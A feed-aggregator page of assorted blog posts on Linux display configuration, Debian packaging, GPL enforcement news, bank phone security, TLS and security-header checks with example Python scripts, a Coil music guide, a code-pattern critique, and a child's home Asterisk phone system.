
 autorandr --save workstation

repeat for any additional configurations you have (or as you find new configurations).

Autorandr has udev, systemd, and pm-utils hooks, and autorandr --change should be run any time that new displays appear. You can also run autorandr --change or autorandr --load workstation manually if you need to. You can also add your own ~/.config/autorandr/$PROFILE/postswitch script to run after a configuration is loaded. Since I run i3, my workstation configuration looks like this:

 #!/bin/bash

 xrandr --dpi 92
 xrandr --output DP2-2 --primary
 i3-msg '[workspace="^(1|4|6)"] move workspace to output DP2-2;'
 i3-msg '[workspace="^(2|5|9)"] move workspace to output DP2-3;'
 i3-msg '[workspace="^(3|8)"] move workspace to output DP2-1;'

which fixes the dpi appropriately, sets the primary screen (possibly not needed?), and moves the i3 workspaces about. You can also arrange for configurations to never be run by adding a block hook in the profile directory.

Check it out if you change your monitor configuration regularly!

Planet Debian: Rogério Brito: Some activities of the day

Yesterday, I printed the first draft of the first chapter while my little boy was here, and he was impressed with this strange object called a "printer". Before I printed what I needed, I fired up LibreOffice, chose the biggest font size available and let him type his first name by himself. He was quicker than I thought with a keyboard. After seeing me print his first name, he was jumping up and down with the joy of having created something and even showed grandma and grandpa what he had done.

He then wanted more, and I taught him how to use the backspace key and what it meant, and he wanted to type his full name. I let him, and taught him that there is a key called space that he should type every time he wants to start a new word; in the end, he typed his first two names. To my surprise, he memorized the icon with the printer (which I must say I have to hunt for every time, since it looks so similar to the adjacent ones!) and pressed this new key called "Enter". When he pressed it, he wasn't expecting the printer on his right to start making noises and printing his name.

He was so excited and it was so nice to see his reaction full of joy to get a job done!

I am thinking of getting a spare computer, building it with him and for him, so that he can call it his computer every time he comes to see daddy. Serendipitously, Packt Publishing offered their title "Python Projects for Kids" yesterday. Unfortunately, he does not yet know how to read, but I guess that the right age is coming soon, which is a good thing for making sure he is educated "the right way" (that is, with the best support, teaching and patience that I can give him).

Anyway, I printed the first draft of the first chapter and today I have to turn it in.

As I write this, I am downloading a virtual machine from Microsoft to try to install Java on it. Let me see if it works. I use none of the virtualization options it is offered for, though the closest seems to be VirtualBox.

Let me cross my fingers.

In other news, I updated some of the tags of very old posts of this blog, and I am seriously thinking about switching from ikiwiki to another blog platform. It is slow, very slow on my system with the repositories that I have, especially on my armel system. Some non-interpreted system would be best, but I don't know if such a thing even exists. But the killer problem is that it doesn't easily support typing mathematics (even though a 3rd party plugin for MathJax exists).

On the other hand, I just received an answer on twitter from @telegram and it was nice:

Hello, Telegram supports bold and italic. You can type **bold** and __italic__. On mobile, you can also highlight text for this as well.

It is nice that this works with telegram-desktop too.

Besides that, I filed some bugs on Debian's BTS, responded to some issues on my projects on GitHub (I'm slowly getting back to maintaining things) and filed wishlist bugs on some other projects.

Oh, and I grabbed a copy of "Wonder Woman" ("Mulher Maravilha") and "Despicable Me 3" ("Meu Malvado Favorito 3") dubbed in Brazilian Portuguese for my son. I have to convert the audio from AAC-LC in 6 channels to AC3 or to stereo. Otherwise, my TVs have problems with the videos (one refuses to play the entire file and another plays the audio with hiccup-like sounds).

Edit: After converting the VirtualBox image taken from Microsoft, I could easily use qemu/kvm to create screenshots of the installation of Java. The command that I used (for future reference) is:

qemu-system-x86_64 -enable-kvm -m 4096 -smp 2 -net nic,model=e1000 -net user -soundhw ac97 -drive index=0,media=disk,cache=unsafe,file=win7.qcow2

Edit: Fixed some typos.

Planet Debian: Dirk Eddelbuettel: RcppQuantuccia 0.0.2

A first maintenance release of RcppQuantuccia got to CRAN earlier today.

RcppQuantuccia brings the Quantuccia header-only subset / variant of QuantLib to R. At present it mostly offers calendaring, but Quantuccia just got a decent amount of new functions so hopefully we can offer more here too.

This release was motivated by the upcoming Rcpp release, which will deprecate the old Date and Datetime vectors in favour of newer ones. So this release of RcppQuantuccia switches to the newer ones.

Other changes are below:

Changes in version 0.0.2 (2017-11-06)

  • Added calendars for Canada, China, Germany, Japan and United Kingdom.

  • Added bespoke and joint calendars.

  • Using new date(time) vectors (#6).

Courtesy of CRANberries, there is also a diffstat report relative to the previous release. More information is on the RcppQuantuccia page. Issues and bugreports should go to the GitHub issue tracker.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.


Harald Welte: SFLC sues SFC over trademark infringement

As the Software Freedom Conservancy (SFC) has publicly disclosed on their website, it appears that Software Freedom Law Center (SFLC) has filed for a trademark infringement lawsuit against SFC.

SFLC launched SFC in 2006, and SFLC has helped and endorsed SFC in the past.

This lawsuit is hard to believe. What has this community come to, if its various members, who all used to be respected equally, start filing lawsuits against each other?

It's of course not known what kind of negotiations might have happened out-of-court before an actual lawsuit has been filed. Nevertheless, one would have hoped that people are able to talk to each other, and that the mutual respect for working at different aspects and with possibly slightly different strategies would have resulted in a less confrontational approach to resolving any dispute.

To me, this story just looks like there can only be losers on all sides, and by no means limited to the two entities in question.

On lwn.net some people, including high-ranking members of the FOSS community, have started to spread conspiracy theories as to whether there's any secret scheming behind the scenes, particularly from the Linux Foundation towards SFLC, to cause trouble for the SFC and their possibly-not-overly-enjoyed-by-everyone enforcement activities.

I think this is complete rubbish. Neither have I ever had the impression that the LF is opposed to license enforcement to begin with, nor do I have remotely enough imagination to see them engage in such malicious scheming.

What motivates SFLC and/or Eben to attack their former offspring is, however, inexplicable to the bystander. One hopes there is no connection to his departure from the FSF about one year ago, where he served as general counsel for more than two decades.

Harald Welte: On the Linux Kernel Enforcement Statement

I'm late with covering this here, but work overload is having its toll on my ability to blog.

On October 16th, key Linux kernel developers released and announced the Linux Kernel Community Enforcement Statement.

In its actual text, those key kernel developers cover

  • compliance with the reciprocal sharing obligations of GPLv2 is critical and mandatory
  • acknowledgement of the right to enforce
  • an expression of interest in ensuring that enforcement actions are conducted in a manner beneficial to the larger community
  • a method to provide reinstatement of rights after ceasing a license violation (see below)
  • that legal action is a last resort
  • that after resolving any non-compliance, the formerly non-compliant user is welcome in the community

I wholeheartedly agree with those. This should be no surprise as I've been one of the initiators and signatories of the earlier statement of the netfilter project on GPL enforcement.

On the reinstatement of rights

The enforcement statement then specifically expresses the view of the signatories on the specific aspect of license termination. Particularly in the US, among legal scholars there is a strong opinion that if the rights under the GPLv2 are terminated due to non-compliance, the infringing entity needs an explicit reinstatement of rights from the copyright holder. The enforcement statement now basically states that the signatories believe the rights should automatically be reinstated if the license violation ceases within 30 days of being notified of the license violation.

To people like me living in the European (and particularly German) legal framework, this has very little to no implications. It has been the major legal position that any user, even an infringing user, can automatically obtain a new license as soon as he no longer violates. He just (in reality or notionally) obtains a new copy of the source code, at which time he again gets a new license from the copyright holders, as long as he fulfills the license conditions.

So my personal opinion as a non-legal person active in GPL compliance on the reinstatement statement is that it changes little to nothing regarding the jurisdiction that I operate in. It merely expresses that other developers express their intent and interest to a similar approach in other jurisdictions.

Krebs on Security: Simple Banking Security Tip: Verbal Passwords

There was a time when I was content to let my bank authenticate me over the phone by asking for some personal identifiers (SSN/DOB) that are broadly for sale in the cybercrime underground. At some point, however, I decided this wasn’t acceptable for institutions that held significant chunks of our money, and I began taking our business away from those that wouldn’t let me add a simple verbal passphrase that needed to be uttered before any account details could be discussed over the phone.

Most financial institutions will let customers add verbal passwords or personal identification numbers (PINs) that are separate from any other PIN or online banking password you might use, although few will advertise this.

Even so, many institutions don’t properly train their customer support staff (or have high turnover in that department). This can allow clever and insistent crooks to coax customer service reps into validating the call with just the SSN and/or date of birth, or with nothing more than the correct answers to so-called knowledge-based authentication (KBA) questions.

As noted in several stories here previously, identity thieves can reliably work around KBA because it involves answering questions about things like previous loans, addresses and co-residents — information that can often be gleaned from online services or social media.

A few years ago, I began testing financial institutions that held our personal assets. I was pleasantly surprised to discover that most of them were happy to add a PIN or pass phrase to the account. But many of the customer service personnel at those institutions failed in their responses when I called in and said I didn’t remember the phrase and was there any other way they could verify that I was me?

Ultimately, I ended up moving our investments to an institution that consistently adhered to my requirements. Namely, that failing to provide the pass phrase required an in-person visit to a bank branch to continue the transaction, at which time ID would be requested. Their customer service folks consistently asked the right questions, and weren’t interested in being helpful beyond that (I’m not going to name the institution for obvious reasons).

Not sure whether your financial institution supports verbal passwords? Ask them. If they agree to set one up for you, take a moment or two over the next few days to call in and see if you can get the customer service folks at that institution to talk about your account without hearing that password.

While a great many people are willing to trade security for more convenience, it’s nice when those of us who are paranoid can opt-in for more security. A great, recent example of this is Google‘s optional “advanced protection” feature, which makes it much harder for password thieves to hack into your Gmail, Drive or other Google properties — even if the attackers already know your password.

“The opt-in, ultra-secure mode is intended for truly high-risk users, including those who face the threat of state-sponsored, highly resourced cyberespionage,” writes Andy Greenberg for Wired. “Think politicians and officials, high net-worth individuals, activists, dissidents, and journalists.”

Greenberg continues:

“As such, it’s a strict and unforgiving system, designed to reinforce every possible weak link that hackers could use to hijack your account. Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google’s malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you’ll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google’s other safeguards.”

Gartner fraud analyst Avivah Litan says she has long relied on verbal passwords for her most important accounts.

“I think a verbal password is a good step and definitely adds more security than does KBA built on top of heavily compromised credit bureau and life history data,” Litan said. “Plus it’s free and convenient. It’s of course not perfect and consumers should try to use verbal passwords that are unique for them and which they don’t use for online passwords — in case the latter have been compromised by hackers.”

Verbal passwords should not be confused with voice biometrics, a technology some financial institutions are now adopting that can help authenticate customers while profiling and blocking fraudsters who repeatedly call in to customer service representatives. Even if your institution offers voice biometrics, adding a verbal password/passphrase is still a good idea.

Julie Conroy, research director at market research firm Aite Group, said financial institutions are still very concerned about putting up too many hurdles for good customers, so many are treading lightly on verbal passwords.

“Many FIs are moving in the direction of not just asking for the password, but also behind the scenes they are performing analysis of the call characteristics as well as the consumer’s voice print,” Conroy said.

Have you asked your financial institution(s) to add a unique verbal password/passphrase for your most important accounts? If so, sound off about your experience in the comments below.

Planet Debian: James Bromberger: Web Security 2017

I started web development around late 1994. Some of my earliest paid web work is still online (dated June 1995). Clearly, that was a simpler time for content! I went on to be ‘Webmaster’ (yes, for those joining us in the last decade, that was a job title once) for UWA, and then for Hartley Poynton/JDV.com at a time when security became important as commerce boomed online.

At the dawn of the web era, the consideration of backwards compatibility with older web clients (browsers) was deemed to be important; content had to degrade nicely, even without any CSS being applied. As the years stretched out, the legacy became longer and longer. Until now.

In mid-2018 the Payment Card Industry (PCI) Data Security Standard (DSS) 3.2 deadline for migrating off SSL and early TLS arrives; in practice that means cardholder data environments moving to TLS 1.2 for the encrypted transfer of data. That is also the highest version generally available today (TLS 1.3 is at draft 21 at the time of writing). This effort by the PCI is forcing people to adopt browsers that can speak TLS 1.2 (and the cipher suites it permits), typically recent Chrome, Firefox, Safari or Edge. For the majority of people that is Chrome, and most of those auto-update on every release.

Many are pushing to be compliant with the 2018 PCI DSS 3.2 as early as possible; your logging of negotiated protocols and ciphers will show if your client base is ready as well. I’ve already worked with one government agency to demonstrate they were ready, and have already helped disable TLS 1.0 and 1.1 on their public facing web sites (and previously SSL v3). We’ve removed RC4 ciphers, 3DES ciphers, and enabled ephemeral key ciphers to provide forward secrecy.
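One way to read that readiness off your own logs, as an added example that is not from the original post: the script below assumes an Apache-style access log whose LogFormat ends in %{SSL_PROTOCOL}x %{SSL_CIPHER}x (my assumption, not something the post states), parses a few constructed lines, counts requests per protocol, lists client addresses never seen negotiating TLS 1.2, and flags the RC4, 3DES and non-ephemeral suites the post describes removing. Suite names follow OpenSSL's conventions, where an ECDHE- or DHE- prefix marks an ephemeral key exchange.

```python
"""Summarise negotiated TLS protocols and ciphers from web server logs.

Added example, not part of the original post.  It assumes an Apache-style
LogFormat ending in %{SSL_PROTOCOL}x %{SSL_CIPHER}x; the log lines below
are constructed for illustration.
"""
import re
from collections import Counter

# Assumed LogFormat: "%h %t \"%r\" %>s %{SSL_PROTOCOL}x %{SSL_CIPHER}x"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<protocol>\S+) (?P<cipher>\S+)$'
)

# Suites the post describes removing: RC4 and 3DES (OpenSSL spells the
# latter DES-CBC3).  Non-ephemeral suites are caught separately below.
WEAK_CIPHER_RE = re.compile(r'RC4|3DES|DES-CBC3', re.IGNORECASE)

# Constructed sample log: six requests from five client addresses.
SAMPLE_LOG = """\
203.0.113.10 [06/Nov/2017:10:00:01 +0800] "GET / HTTP/1.1" 200 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256
203.0.113.11 [06/Nov/2017:10:00:02 +0800] "GET /login HTTP/1.1" 200 TLSv1 AES256-SHA
203.0.113.12 [06/Nov/2017:10:00:03 +0800] "GET / HTTP/1.1" 200 TLSv1.1 ECDHE-RSA-AES256-SHA
203.0.113.13 [06/Nov/2017:10:00:04 +0800] "GET / HTTP/1.1" 200 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
203.0.113.14 [06/Nov/2017:10:00:05 +0800] "GET /pay HTTP/1.1" 200 TLSv1 RC4-SHA
203.0.113.10 [06/Nov/2017:10:00:06 +0800] "GET /cart HTTP/1.1" 200 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256
"""


def parse_lines(text):
    """Yield one dict per line matching LINE_RE; unparseable lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def has_forward_secrecy(cipher):
    """True for ephemeral (EC)DHE key exchange, by OpenSSL suite naming."""
    return cipher.startswith(('ECDHE-', 'DHE-'))


def summarise(text):
    """Return (requests per protocol, client addresses never seen on TLS 1.2,
    ciphers seen that are weak or lack forward secrecy)."""
    by_protocol = Counter()
    best_per_host = {}
    flagged = set()
    for rec in parse_lines(text):
        by_protocol[rec['protocol']] += 1
        if rec['protocol'] == 'TLSv1.2':
            best_per_host[rec['host']] = 'TLSv1.2'
        else:
            best_per_host.setdefault(rec['host'], rec['protocol'])
        if WEAK_CIPHER_RE.search(rec['cipher']) or not has_forward_secrecy(rec['cipher']):
            flagged.add(rec['cipher'])
    not_ready = sorted(h for h, p in best_per_host.items() if p != 'TLSv1.2')
    return by_protocol, not_ready, flagged


def readiness_ratio(text):
    """Fraction of requests that already negotiated TLS 1.2."""
    by_protocol, _, _ = summarise(text)
    total = sum(by_protocol.values())
    return by_protocol['TLSv1.2'] / total if total else 0.0


if __name__ == '__main__':
    counts, not_ready, flagged = summarise(SAMPLE_LOG)
    for proto, n in sorted(counts.items()):
        print(f'{proto:<8} {n}')
    print('clients never seen on TLS 1.2:', ', '.join(not_ready))
    print('suites to remove:', ', '.join(sorted(flagged)))
    print(f'TLS 1.2 share: {readiness_ratio(SAMPLE_LOG):.0%}')
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; a client that shows up only under TLSv1 or TLSv1.1 is the one that will break when those protocols are disabled, which is exactly the list worth having before the switch is flipped.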

Web developers (writing JavaScript and using various frameworks) can rejoice: the age of having to support legacy MS IE 6/7/8/9/10 is pretty much over. None of those browsers enable TLS 1.2 out of the box (IE 8 to 10 on Windows 7 and later can have it switched on, but it is off by default). This makes JavaScript code smaller, as it no longer needs conditional code to work around the quirks of those older clients.

But as we find ourselves with modern clients, we can now ask those clients to be complicit in our attempts to secure the content we serve. They understand modern security constructs such as Content Security Policies and other HTTP security-related headers.

There are two tools I am currently using to help in this battle to improve web security. One is SSLLabs.com, the work of Ivan Ristić (and now owned/sponsored by Qualys). This tool gives a good view of the encryption in flight (protocols, ciphers), the chain of trust (certificate), and has recently added a check of DNS for CAA records (which I and others piled on a feature request for AWS Route53 to support). The second tool is Scott Helme’s SecurityHeaders.io, which looks at the HTTP headers that web content uses to ask browsers to enforce security on the client side.

There’s a really important reason why these tools are good; they are maintained. As new recommendations on ciphers, protocols, signature algorithms or other actions become recommended, they’re updated on these tools. And these tools are produced by very small, but agile teams — like one person teams, without the bureaucracy (and lag) associated with large enterprise tools. But these shouldn’t be used blindly. These services make suggestions, and you should research them yourselves. For some, not all the recommendations may meet your personal risk profile. Personally, I’m uncomfortable with Public-Key-Pins, so that can wait for a while — indeed, Chrome has now signalled they will drop this.
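To show what such a header check looks like in code, here is an added example; it is not SecurityHeaders.io's logic and not part of the original post. It parses a raw HTTP response (two constructed samples, one weak and one hardened) and reports findings against a baseline I chose for illustration: HSTS of at least six months with includeSubDomains, a Content-Security-Policy whose script-src has no 'unsafe-inline', some framing restriction, X-Content-Type-Options: nosniff and a Referrer-Policy. Following the caveat above about not taking recommendations blindly, a Public-Key-Pins header is reported as something to review rather than as a win.

```python
"""Audit the security-related headers of an HTTP response.

Added example, not the logic behind SecurityHeaders.io and not part of the
original post.  The baseline it checks against is my own choice for
illustration, and both responses below are constructed samples.
"""
import re

HSTS_MIN_AGE = 15552000  # six months in seconds (assumed threshold)

# Constructed sample: a site that sets nothing useful and leaks its stack.
WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.6
"""

# Constructed sample: the same site after tightening its headers.
HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
"""


def parse_headers(raw):
    """Map lower-cased header names to values; stops at the first blank line."""
    headers = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        if not line.strip():
            break
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return headers


def audit(raw):
    """Return a sorted list of findings; an empty list means nothing to fix."""
    h = parse_headers(raw)
    findings = []

    hsts = h.get('strict-transport-security')
    if hsts is None:
        findings.append('missing Strict-Transport-Security')
    else:
        m = re.search(r'max-age=(\d+)', hsts)
        if not m or int(m.group(1)) < HSTS_MIN_AGE:
            findings.append('Strict-Transport-Security max-age below six months')
        if 'includesubdomains' not in hsts.lower():
            findings.append('Strict-Transport-Security lacks includeSubDomains')

    csp = h.get('content-security-policy')
    if csp is None:
        findings.append('missing Content-Security-Policy')
    else:
        script_src = re.search(r"(?:^|;)\s*script-src([^;]*)", csp)
        if script_src and "'unsafe-inline'" in script_src.group(1):
            findings.append("Content-Security-Policy allows 'unsafe-inline' scripts")

    # Either CSP frame-ancestors or X-Frame-Options must restrict framing.
    framed = 'x-frame-options' in h or (csp is not None and 'frame-ancestors' in csp)
    if not framed:
        findings.append('no framing restriction (frame-ancestors or X-Frame-Options)')

    if h.get('x-content-type-options', '').lower() != 'nosniff':
        findings.append('missing X-Content-Type-Options: nosniff')
    if 'referrer-policy' not in h:
        findings.append('missing Referrer-Policy')
    if 'x-powered-by' in h:
        findings.append('X-Powered-By discloses the server stack')
    # Pinning is reported for review, not as a win: a bad pin locks every client out.
    if 'public-key-pins' in h:
        findings.append('Public-Key-Pins is set; review the pins and the lock-out risk')
    return sorted(findings)


if __name__ == '__main__':
    for label, raw in (('weak', WEAK_RESPONSE), ('hardened', HARDENED_RESPONSE)):
        found = audit(raw)
        print(f'{label}: {len(found)} finding(s)')
        for f in found:
            print('  -', f)
```

Feed it the output of a HEAD request (curl -sI https://example.com, for instance) and the hardened sample returns no findings while the weak one returns six; the thresholds are the part to adjust to your own risk profile, which is the point the paragraph above makes about the hosted checkers too.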

So while PCI is hitting merchants with their DSS-compliance stick (and making it plainly obvious what they have to do), we’re getting a side-effect: a concrete reason for drawing a line under how far back our backward compatibility must stretch, and the ability to have the web client assist in securing content.

TED: Watch Facebook Live sessions, live from TEDWomen in New Orleans

Join us for four in-depth conversations over two days, live from the Blue Room at TEDWomen, hosted by podcaster Manoush Zomorodi. Guests include TEDWomen speakers Gretchen Carlson, Sally Kohn, Cleo Wade and Justin Baldoni. Find them all on Facebook at facebook.com/TED, or get direct links below to each super-worthwhile conversation.

Facebook Live with Gretchen Carlson
Broadcast journalist Gretchen Carlson joins us for a newsworthy interview about sexual harassment and assault in the workplace and what we can do to end it.

Facebook Live with Sally Kohn
Political pundit Sally Kohn talks with Manoush about media bias and the challenge of reporting news that speaks to both sides.

Facebook Live with Cleo Wade
Artist and poet Cleo Wade joins Manoush in the Blue Room for an interview about finding your voice and using your power to create change.

Facebook Live with Justin Baldoni
Actor Justin Baldoni from CW’s Jane the Virgin talks with Manoush about challenging gender stereotypes, redefining masculinity, and working together to end sexism.


Planet Debian: Jonathan Dowland: Coil

Peter Christopherson and Jhonn Balance, from Santa Sangre (https://santasangremagazine.wordpress.com/2014/11/16/the-angelic-conversation-in-remembrance-of-coil/)

A friend asked me to suggest five tracks by Coil that gave an introduction to their work. Trying to summarize Coil in 5 tracks is tough. I think it's probably impossible to fairly summarize Coil with any subset of their music, for two reasons.

Firstly, their music was the output of their work but I don't think is really the whole of the work itself. There's a real mystique around them. They were deeply interested in arcana, old magic, Aleister Crowley, scatology; they were both openly and happily gay and their work sometimes explored their experiences in various related underground scenes and sub-cultures; they lost friends to HIV/AIDS and that had a profound impact on them. They had a big influence on some people who discovered them who were exploring their own sexualities at the time and might have felt excluded from mainstream society. They frequently explored drugs, meditation and other ways to try to expand and open their minds; occultism. They were also fiercely anti-commercial, their stuff was released in limited quantities across a multitude of different music labels, often under different names, and often paired with odd physical objects, runes, vials of blood, etc. Later fascinations included paganism and moon worship. I read somewhere that they literally cursed one of their albums.

Secondly, part of their "signature" was the lack of any consistency in their work, or to put it another way, their style over time varied enormously. I'm also not necessarily well-versed in all their stuff, I'm part way on this journey myself... but these are tracks which stand out at least from the subset I've listened to.

Both original/core members of Coil have passed away and the legal status of their catalogue is in a state of limbo. Some of these songs are available on currently-in-print releases, but all such releases are under dispute by some associate or other.

1. Heaven's Blade

Like (probably) a lot of Coil songs, this one exists in multiple forms, with some dispute about which are canonical, which are officially sanctioned, etc. the video linked above actually contains 5 different versions, but I've linked to a time offset to the 4th: "Heaven's Blade (Backwards)". This version was the last to come to light with the recent release of "Backwards", an album originally prepared in the 90s at Trent Reznor's Nothing Studios in New Orleans, but not finished or released. The circumstances around its present-day release, as well as who did what to it and what manipulation may have been performed to the audio a long time after the two core members had passed, is a current topic in fan circles.

Despite that, this is my preferred version. You can choose to investigate the others, or not, at your own discretion.

2. how to destroy angels (ritual music for the accumulation of male sexual energy)

A few years ago, "guidopaparazzi", a user at the Echoing the Sound music message board attempted to listen to every Coil release ever made and document the process. He didn't do it chronologically, leaving the EPs until near the end, which is when he tackled this one (which was the first release by Coil, and was the inspiration behind the naming of Trent Reznor's one-time side project "How To Destroy Angels").

Guido seemed to think this was some kind of elaborate joke. Personally I think it's a serious piece and there's something to it but this just goes to show, different people can take things in entirely different ways. Here's Guido's review, and you can find the rest of his reviews linked from that one if you wish.

https://archive.org/details/Coil-HowToDestroyAngels1984

3. Red Birds Will Fly Out Of The East And Destroy Paris In A Night

Both "Musick To Play In The Dark" volumes (one and two) are generally regarded as amongst the most accessible entry points to the Coil discography. This is my choice of cut from volume 1.

For some reason this reminds me a little of some of the background music from the game "Unreal Tournament". I haven't played that in at least 15 years. I should go back and see if I can figure out why it does.

The whole EP is worth a listen, especially at night.

https://archive.org/details/CoilMusickToPlayInTheDarkVol1/Coil+-+Musick+To+Play+In+The+Dark+Vol+1+-+2+Red+Birds+Will+Fly+Out+Of+The+East+And+Destroy+Paris+In+A+Night.flac

4. Things Happen

It's tricky to pick a track from either "Love's Secret Domain" or "Horse Rotorvator"; there are other choices which I think are better known and loved than this one but it's one that haunted me after I first heard it for one reason or another, so here it is.

5. The Anal Staircase

Track 1 from Horse Rotorvator. What the heck is a Horse Rotorvator anyway? I think it was supposed to have been a lucid nightmare experienced by the vocalist Jhonn Balance. So here they wrote a song about anal sex. No messing about, no allusion particularly, but why should there be?

https://archive.org/details/CoilHorseRotorvator2001Remaster/Coil+-+Horse+Rotorvator+%5B2001+remaster%5D+-+01+The+Anal+Staircase.flac

Bonus 6th: 7-Methoxy-B-Carboline (Telepathine)

From the drone album "Time Machines", which has just been re-issued by DIAS records, who describe it as "authorized". Each track is titled by the specific combination of compounds that inspired its composition, supposedly. Or, perhaps it's a "recommended dosing" for listening along.

https://archive.org/details/TimeMachines-TimeMachines

Post-script

If those piqued your interest, there's some decent words and a list of album suggestions in this Vinyl Factory article.

Finally, if you can track them down, Stuart Maconie had two radio shows about Coil on his "Freak Zone" programme. The main show discusses the release of "Backwards", including an interview with collaborator Danny Hyde, who was the main person behind the recent re-issue. The shorter show is entitled John Doran uncoils Coil. Guest John Doran from The Quietus discusses the group and their history interspersed with Coil tracks and tracks from their contemporaries. Interestingly they chose a completely different set of 5 tracks to me.

Worse Than Failure: CodeSOD: The Distract Factory Pattern

The Gang-of-Four design patterns have an entire category of creational patterns, to handle the complexities of creating objects. And yes, it can get complicated, especially when we think in terms of the single-responsibility principle. Often, creating an instance of a class is itself so complex that we need a new class to do it.

Thus, we have the Factory pattern. And the Abstract Factory Pattern. And the Abstract Factory Factory Abstract Provider Bean pattern, if you’re using Spring. The purpose of these patterns is to add indirection between the client, calling code, and the creation of the objects- different concrete implementations can be instantiated, without the client code needing to worry about what actual type it received. Polymorphism wins the day. Code is more loosely coupled, because the client code never needs to name the concrete type it uses.

Unless you want to do it wrong, in which case Jen M found this particular solution:

public abstract class TaskBase
{
        public static TaskBase CreateInstance(
                Manager manager,
                Type TaskType)
        {
                object[] args = {manager, -1};

                return Activator.CreateInstance(TaskType, args) as TaskBase;
        }

        public static TaskBase CreateInstance(
                Manager manager,
                int taskId,
                string fullyQualifiedTypeName)
        {
                var TaskType = TypeLoader.GetType(fullyQualifiedTypeName, true);

                object[] args = {manager, taskId};

                var taskInstance = Activator.CreateInstance(TaskType, args) as TaskBase;

                return taskInstance;
        }
}

In this version, you specify the concrete child of TaskBase that you want an instance of, and the helper calls the constructor for you. That means you could write:

var task = TaskBase.CreateInstance(mgr, typeof(MyDll.MyPackage.BasicTask))

Which is obviously far more loosely coupled than:

var task = new BasicTask(mgr);

Note also that the second overload resolves the type from a string at run time, and the "as TaskBase" cast only checks the result after the constructor has already run; if that type name can come from configuration or a request, any loadable type with a matching constructor can be instantiated, so this is a pattern to keep well away from untrusted input.

As Jen puts it: “Some of the code I see makes me want to quit my job and go hunt down the people who wrote it. This is one of those instances.” Instead, Jen replaced this code with an actual version of the Factory pattern.


Planet Debian: Andreas Bombe: Reviving GHDL in Debian

It has been a few years since Debian last had a working VHDL simulator in the archive. The rival language Verilog is covered by the iverilog and verilator simulator packages, but GHDL was the only option for VHDL in Debian, and it became broken, was orphaned and was eventually removed. I have just submitted an ITP to make my work on it official.

A lot has changed since the last Debian upload of GHDL. Upstream development is quite active and it has gained free reimplementations of the standard library definitions (the lack of which frustrated at least two attempts at adoption of the Debian package). It has gained additional backends, in addition to GCC it can now also use LLVM and its own custom mcode (x86 only) code generator. The mcode backend should provide faster compilation at the expense of lacking sophisticated optimization, hence it might be preferable over the other two for small projects.

My intentions are to provide all three backends in separate packages which would also offer easier backend troubleshooting—a user experiencing problems can simply install another package to try a different backend. The problem with that idea is that GHDL is not designed for that kind of parallel installation. The backend is chosen at build configure time and that configuration is built and installed. Parallel installation will probably need some development but if that would turn out to be much work I could always have the packages conflicting initially.

Given all these changes I am redoing the Debianization from ground up and maybe take bits and pieces from the old packaging where suitable. Right now I’m building the different backends to compare and see what files are backend specific and what can go into a common package.

Planet Debian: John Goerzen: The Yellow House Phone Company (Featuring Asterisk and an 11-year-old)

“Well Jacob, do you think we should set up our own pretend phone company in the house?”

“We can DO THAT?”

“Yes!”

“Then… yes. Yes! YES YES YESYESYESYES YES! Let’s do it, dad!”

Not long ago, my parents had dug up the old phone I used back in the day. We still have a landline, and Jacob was having fun discovering how an analog phone works. I told him about the special number he could call to get the time and temperature read out to him. He discovered what happens if you call your own number and hang up. He figured out how to play “Mary Had a Little Lamb” using touchtone keys (after a slightly concerned lecture from me setting out some rules to make sure his “musical dialing” wouldn’t result in any, well, dialing.)

He was hooked. So I thought that taking it to the next level would be a good thing for a rainy day. I have run Asterisk before, though I had unfortunately gotten rid of most of my equipment some time back. But I found a great deal on a Cisco ATA 186 (Analog Telephone Adapter). It has two FXS lines (FXS ports simulate the phone company, and provide dialtone and ring voltage to a connected phone), and of course hooks up to the LAN.

We plugged that in, and Jacob was amazed to see its web interface come up. I had to figure out how to configure it (unfortunately, it uses SCCP rather than SIP, and figuring out Asterisk’s chan_skinny took some doing, but we got there.)

I set up voicemail. He loved it. He promptly figured out how to record his own greetings. We set up a second phone on the other line, so he could call between them. The cordless phones in our house support SIP, so I configured one of them as a third line. He spent a long time leaving himself messages.


Pretty soon we both started having ideas. I set up extension 777, where he could call for the time. Then he wanted a way to get the weather forecast. Well, weather-util generates a text-based report. With it, a little sed and grep tweaking, the espeak TTS engine, and a little help from sox, I had a shell script worked up that would read back a forecast whenever he called a certain extension. He was super excited! “That’s great, dad! Can it also read weather alerts too?” Sure! weather-util has a nice option just for that. Both boys cackled as the system tried to read out the NWS header (their timestamps like 201711031258 started with “two hundred one billion…”)

Then I found an online source for streaming NOAA Weather Radio feeds – Jacob enjoys listening to weather radio – and I set up another extension he could call to listen to that. More delight!

But it really took off when I asked him, “Would you like to record your own menu?” “You mean those things where it says press 1 or 2 for this or that?” “Yes.” “WE CAN DO THAT?” “Oh yes!” “YES, LET’S DO IT RIGHT NOW!”

So he recorded a menu, then came and hovered by me while I hacked up extensions.conf, then eagerly went back to the phone to try it. Oh the excitement of hearing his own voice, and finding that it worked! Pretty soon he was designing sub-menus (“OK Dad, so we’ll set it up so people can press 2 for the weather, and then choose if they want weather radio or the weather report. I’m recording that now. Got it?”)

